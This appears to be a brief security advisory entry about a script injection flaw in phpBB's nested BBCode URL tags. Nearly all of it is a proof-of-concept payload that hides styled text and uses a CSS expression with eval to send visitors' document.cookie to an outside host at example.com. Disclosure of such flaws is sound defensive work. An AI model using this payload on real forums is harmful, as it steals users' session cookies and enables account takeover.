|
PHPBB Nested BBCode URL Tag Script Injection Vulnerability
No exploit is required. The following proof of concept is available: [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'styl e='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.example.com/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/u rl][/url]'[/color] |
|
 Privacy Statement |
